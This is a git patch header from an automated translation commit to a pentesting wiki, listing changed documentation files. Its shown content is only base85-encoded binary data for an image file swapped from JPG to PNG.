From b25d4663a6fdbdca5cf529c778417b8ddad0a722 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Tue, 7 Oct 2025 10:27:07 +0000
Subject: [PATCH] Translated ['', 'src/pentesting-web/command-injection.md',
 'src/linux-ha

---
 src/images/k8studio.jpg                       | Bin 6667 -> 0 bytes
 src/images/k8studio.png                       | Bin 0 -> 88827 bytes
 .../privilege-escalation/README.md            | 625 +++++++++---------
 .../pentesting-web/cgi.md                     |  53 +-
 .../pentesting-web/web-api-pentesting.md      |  96 ++-
 .../pentesting-web/wordpress.md               | 452 ++++++-------
 src/pentesting-web/command-injection.md       |  52 +-
 src/welcome/hacktricks-values-and-faq.md      | 118 ++--
 8 files changed, 717 insertions(+), 679 deletions(-)
 delete mode 100644 src/images/k8studio.jpg
 create mode 100644 src/images/k8studio.png

diff --git a/src/images/k8studio.jpg b/src/images/k8studio.jpg
deleted file mode 100644
index 1c427e89fa5348b69ee377112fe4841a2960c2f8..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6667
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
aSMyP>bE5UmqebZX#jO=e^LrmJ_Wd8$Cy6rv

diff --git a/src/images/k8studio.png b/src/images/k8studio.png
new file mode 100644
index 0000000000000000000000000000000000000000..0add889f2f1854c1141ca35b43a867a37bbb1b57
GIT binary patch
literal 88827
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
